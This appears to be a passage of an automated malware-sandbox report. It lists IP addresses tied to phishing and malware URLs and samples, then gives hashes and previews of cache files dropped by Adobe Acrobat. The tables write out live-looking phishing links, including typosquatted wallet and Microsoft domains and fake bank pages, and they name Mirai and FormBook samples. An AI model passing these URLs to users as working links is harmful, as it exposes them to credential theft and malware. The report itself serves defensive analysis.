                                                                    https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.3.184
                                                                    https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.3.184
                                                                    https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousUnknownBrowse
                                                                    • 104.17.3.184
                                                                    https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                                    • 104.17.3.184
                                                                    code.jquery.comhttps://filetransfer.io/data-package/sikJT8Pb/downloadGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    https://pub-f99e2b2dafd440acb935db5a40c7576b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    http://wegwegwegwefwe.blogspot.mk/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    http://akbank-mobilkredim.vercel.app/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.130.137
                                                                    https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.66.137
                                                                    http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    https://ios-trezorsuite.com/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.66.137
                                                                    https://pub-e075ab4e149d4f35814a7b43f741bb9d.r2.dev/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.130.137
                                                                    http://sumydeko.blogspot.com.eg/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.66.137
                                                                    https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttps://filetransfer.io/data-package/sikJT8Pb/downloadGet hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.96.3
                                                                    https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
                                                                    • 104.18.43.31
                                                                    https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 172.67.24.186
                                                                    SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    KT-L068310.exeGet hashmaliciousFormBookBrowse
                                                                    • 188.114.96.3
                                                                    SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 162.247.243.29
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 104.18.43.31
                                                                    http://cctv.hotmail.cloudns.org/Get hashmaliciousUnknownBrowse
                                                                    • 172.67.156.40
                                                                    http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.247.203
                                                                    FASTLYUShttps://filetransfer.io/data-package/sikJT8Pb/downloadGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
                                                                    • 151.101.129.140
                                                                    https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.130.208
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 151.101.65.108
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 151.101.1.140
                                                                    http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 185.199.108.133
                                                                    https://pub-f99e2b2dafd440acb935db5a40c7576b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    http://advanceweb-netzero-2023.square.site/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.129.46
                                                                    https://usw2.nyl.as/t1/211/9bl5nlgyxxdd19wwlu9zlj899/0/4f9515399b4920358d1e61769ae80a5f9d1a2ec7871dcf9ba4a7de6d8c500fdcGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.133
                                                                    http://095485843.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.129.46
                                                                    GridhostZAhttps://url.us.m.mimecastprotect.com/s/m0zFC5yEYqhPZQA5tz31aK?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                                                                    • 41.185.8.57
                                                                    https://url.us.m.mimecastprotect.com/s/m0zFC5yEYqhPZQA5tz31aK?domain=urldefense.proofpoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 41.185.8.57
                                                                    aowNKqhrAX.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.61.164.240
                                                                    FW IMPORTANT DVO 96FEJJ - Distribution_Notice.emlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 41.185.8.68
                                                                    https://down2earthincs.us17.list-manage.com/track/click?u=a6722c149df2e70d2e90b77d5&id=0c16d919d5&e=627038960f//#/?//bWlyZWxhLnB1cmNhcmVhQG90Yy5nb3YudWs=Get hashmaliciousHTMLPhisherBrowse
                                                                    • 41.185.8.68
                                                                    k1ojqk6Ntd.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.61.164.241
                                                                    7t5zI3LtK8.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.185.90.221
                                                                    https://kinolorber.com/store/wishlist/add/id/4810?redir=http%3A%2F%2FtxvdrswfrgZAOWJRIVIX.lockandgocanaltrips.co.uk/whitelist/index.php?e=YmZlcnJpZXJAbWVkdXNhbWVkaWNhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                    • 41.185.8.68
                                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 41.185.180.232
                                                                    Zsw9n2qDyj.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.185.180.228
                                                                    CLOUDFLARENETUShttps://filetransfer.io/data-package/sikJT8Pb/downloadGet hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.96.3
                                                                    https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
                                                                    • 104.18.43.31
                                                                    https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 172.67.24.186
                                                                    SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    KT-L068310.exeGet hashmaliciousFormBookBrowse
                                                                    • 188.114.96.3
                                                                    SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 162.247.243.29
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 104.18.43.31
                                                                    http://cctv.hotmail.cloudns.org/Get hashmaliciousUnknownBrowse
                                                                    • 172.67.156.40
                                                                    http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.247.203
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    28a2c9bd18a11de089ef85a160da29e4https://www.unsubv1.site/Get hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    https://filetransfer.io/data-package/sikJT8Pb/downloadGet hashmaliciousHTMLPhisherBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    http://cctv.hotmail.cloudns.org/Get hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    http://wuyouo.cn/Get hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    https://ms-1drive.com/v/794850bf-f104-442e-acb0-475634834ddaGet hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    https://pub-f99e2b2dafd440acb935db5a40c7576b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                    • 40.127.169.103
                                                                    • 184.28.90.27
                                                                    No context
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):290
                                                                    Entropy (8bit):5.122972357128297
                                                                    Encrypted:false
                                                                    SSDEEP:6:DsMAq2PRN2nKuAl9OmbnIFUt86qwZmw+6q4kwORN2nKuAl9OmbjLJ:DfAvaHAahFUt86qw/+6q45JHAaSJ
                                                                    MD5:531D5D3F998616B98F2C75870BE204C5
                                                                    SHA1:8DD0F710791FD180B7AD27221485131B3E2449AE
                                                                    SHA-256:3CFC99018CCCB89E5BB5EEA9997BC82364B7D2563965D69BB0B30BEEB20EC0CF
                                                                    SHA-512:F20F4CE8AC8781D9D66A8F87E166201C5011BD95926228DCCA9E1DA952A86460713760A64830BD963D14D850FD30442ED46E08E70232BD1F91F30566D147A8B0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:2024/05/23-23:01:50.353 19e0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/23-23:01:50.355 19e0 Recovering log #3.2024/05/23-23:01:50.355 19e0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):290
                                                                    Entropy (8bit):5.122972357128297
                                                                    Encrypted:false
                                                                    SSDEEP:6:DsMAq2PRN2nKuAl9OmbnIFUt86qwZmw+6q4kwORN2nKuAl9OmbjLJ:DfAvaHAahFUt86qw/+6q45JHAaSJ
                                                                    MD5:531D5D3F998616B98F2C75870BE204C5
                                                                    SHA1:8DD0F710791FD180B7AD27221485131B3E2449AE
                                                                    SHA-256:3CFC99018CCCB89E5BB5EEA9997BC82364B7D2563965D69BB0B30BEEB20EC0CF
                                                                    SHA-512:F20F4CE8AC8781D9D66A8F87E166201C5011BD95926228DCCA9E1DA952A86460713760A64830BD963D14D850FD30442ED46E08E70232BD1F91F30566D147A8B0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:2024/05/23-23:01:50.353 19e0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/23-23:01:50.355 19e0 Recovering log #3.2024/05/23-23:01:50.355 19e0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):334
                                                                    Entropy (8bit):5.116419997711846
                                                                    Encrypted:false
                                                                    SSDEEP:6:Dm+q2PRN2nKuAl9Ombzo2jMGIFUt86xZmw+6CVkwORN2nKuAl9Ombzo2jMmLJ:Dm+vaHAa8uFUt86x/+6CV5JHAa8RJ
                                                                    MD5:51498A59C8AA0B869611F28D955175D9
                                                                    SHA1:7A89676FA936AE98CFF205F21CF51326C53E9387
                                                                    SHA-256:98A1D7D0AFF4E55A06A363C5A0FDBE64F312A3EFAC8BC11A90FF41DA91E2A668
                                                                    SHA-512:0DE1A34EAD206419C466CB32A69075FDBB41E2D4AC77A6802BF05A34BB4CBA4E3E50D85CECEAC157C05164193944382477C92F80DE59BE50FCD231B49F313B17
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:2024/05/23-23:01:50.255 1abc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/23-23:01:50.258 1abc Recovering log #3.2024/05/23-23:01:50.259 1abc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):334
                                                                    Entropy (8bit):5.116419997711846
                                                                    Encrypted:false
                                                                    SSDEEP:6:Dm+q2PRN2nKuAl9Ombzo2jMGIFUt86xZmw+6CVkwORN2nKuAl9Ombzo2jMmLJ:Dm+vaHAa8uFUt86x/+6CV5JHAa8RJ
                                                                    MD5:51498A59C8AA0B869611F28D955175D9
                                                                    SHA1:7A89676FA936AE98CFF205F21CF51326C53E9387
                                                                    SHA-256:98A1D7D0AFF4E55A06A363C5A0FDBE64F312A3EFAC8BC11A90FF41DA91E2A668
                                                                    SHA-512:0DE1A34EAD206419C466CB32A69075FDBB41E2D4AC77A6802BF05A34BB4CBA4E3E50D85CECEAC157C05164193944382477C92F80DE59BE50FCD231B49F313B17
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:2024/05/23-23:01:50.255 1abc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/23-23:01:50.258 1abc Recovering log #3.2024/05/23-23:01:50.259 1abc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.953858338552356
                                                                    Encrypted:false
                                                                    SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.99296113031368
                                                                    Encrypted:false
                                                                    SSDEEP:12:YHO8sq0EsBdOg2Hgcaq3QYiubrP7E4T3y:YXsZdMHL3QYhbz7nby
                                                                    MD5:4DB0BF063B99B953D320D8608D1C7DEB
                                                                    SHA1:CFC01007F495E3457AC2C415BCB3356C07A9F057
                                                                    SHA-256:11FCFAD54B472D3BC1B3FE408C1B7D94EA2B1758F99B3B92730C26F40432225D
                                                                    SHA-512:8C0717526FC5F0C2C8D237D1156D9314276B2FC91C39BEC2CDB667E7C2F7C01DFCB923FFDA8DED5620E3F7E36AF36DBBF3D2FCEFB7F2F468D727EDFCBFE8B7E3
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13361079715932550","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":135986},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.953858338552356
                                                                    Encrypted:false
                                                                    SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.953858338552356
                                                                    Encrypted:false
                                                                    SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4099
                                                                    Entropy (8bit):5.23349199621978
                                                                    Encrypted:false
                                                                    SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xeI6qu1:OLT0bTIeYa51Ogu/0OZARBT8kN88Ixu1
                                                                    MD5:C67F8CD09C959FB56A6611D861126B70
                                                                    SHA1:AFC4594EE146A3B9F7EF83ED8751545BF1F1CF1B
                                                                    SHA-256:42C32AA08EF7987498C16ECC683122A62ED5077EA8C97A65BE14F59D40409885
                                                                    SHA-512:9C5F5BA42488DB3FB7CD54FDED17133EC3E88E1340737A7247888B5C997E455E21810FCBEAEE6F55BA57E0253888280D1B14A7B32BA2051A03FFCAB4A86E1956
                                                                    Malicious:false
                                                                    Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):322
                                                                    Entropy (8bit):5.1392670156303
                                                                    Encrypted:false
                                                                    SSDEEP:6:DYFG3+q2PRN2nKuAl9OmbzNMxIFUt86yUFZmw+692VkwORN2nKuAl9OmbzNMFLJ:DYFi+vaHAa8jFUt86l/+64V5JHAa84J
                                                                    MD5:67978BC42F8A27855011608194D4D157
                                                                    SHA1:DABD5EB95619265430D07626349A8A5E5DEAE549
                                                                    SHA-256:3ED507974A218042D6574F5FAF1FF55554A4832E97B16C95A3A16BE3AFE039DC
                                                                    SHA-512:4A228E512B26B5C2F03918B15320461E2708F94342B1E552587CEF4A9EBD287EE8690000570C02C844943E074E79B11592FA1D8FAF218EEB65B45AB6F7E75212
                                                                    Malicious:false
                                                                    Preview:2024/05/23-23:01:50.407 1abc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/23-23:01:50.409 1abc Recovering log #3.2024/05/23-23:01:50.411 1abc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):322
                                                                    Entropy (8bit):5.1392670156303
                                                                    Encrypted:false
                                                                    SSDEEP:6:DYFG3+q2PRN2nKuAl9OmbzNMxIFUt86yUFZmw+692VkwORN2nKuAl9OmbzNMFLJ:DYFi+vaHAa8jFUt86l/+64V5JHAa84J
                                                                    MD5:67978BC42F8A27855011608194D4D157
                                                                    SHA1:DABD5EB95619265430D07626349A8A5E5DEAE549
                                                                    SHA-256:3ED507974A218042D6574F5FAF1FF55554A4832E97B16C95A3A16BE3AFE039DC
                                                                    SHA-512:4A228E512B26B5C2F03918B15320461E2708F94342B1E552587CEF4A9EBD287EE8690000570C02C844943E074E79B11592FA1D8FAF218EEB65B45AB6F7E75212
                                                                    Malicious:false
                                                                    Preview:2024/05/23-23:01:50.407 1abc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/23-23:01:50.409 1abc Recovering log #3.2024/05/23-23:01:50.411 1abc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):3.291927920232006
                                                                    Encrypted:false
